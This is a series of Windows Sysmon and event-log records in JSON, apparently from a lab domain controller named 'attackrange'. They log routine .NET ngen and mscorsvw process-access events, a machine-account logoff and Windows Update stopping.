{"EventTime":"2020-08-01 08:03:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6474,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:10.585\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:10.585","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6475,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:10.585\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-001028BB0900}\r\nSourceProcessId: 3152\r\nSourceThreadId: 3288\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:10.585","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-001028BB0900}","SourceProcessId":"3152","SourceThreadId":"3288","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:17","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220688,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9A8CB\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9a8cb","LogonType":"3","EventReceivedTime":"2020-08-01 08:03:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6476,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:18.445\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21C6-5F25-0000-0010BBF20900}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:18.445","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21C6-5F25-0000-0010BBF20900}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6477,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:18.445\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21C6-5F25-0000-0010BBF20900}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:18.445","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21C6-5F25-0000-0010BBF20900}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6478,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:18.460\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21C6-5F25-0000-0010BBF20900}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:18.460","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21C6-5F25-0000-0010BBF20900}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6479,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:18.460\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nTargetProcessId: 3144\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:18.460","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","TargetProcessId":"3144","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76872,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The Windows Update service entered the stopped state.","param1":"Windows Update","param2":"stopped","EventReceivedTime":"2020-08-01 08:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6480,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:18.789\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21C6-5F25-0000-001078F70900}\r\nTargetProcessId: 4308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:18.789","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21C6-5F25-0000-001078F70900}","TargetProcessId":"4308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6481,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:18.789\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21C6-5F25-0000-001078F70900}\r\nTargetProcessId: 4308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:18.789","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21C6-5F25-0000-001078F70900}","TargetProcessId":"4308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
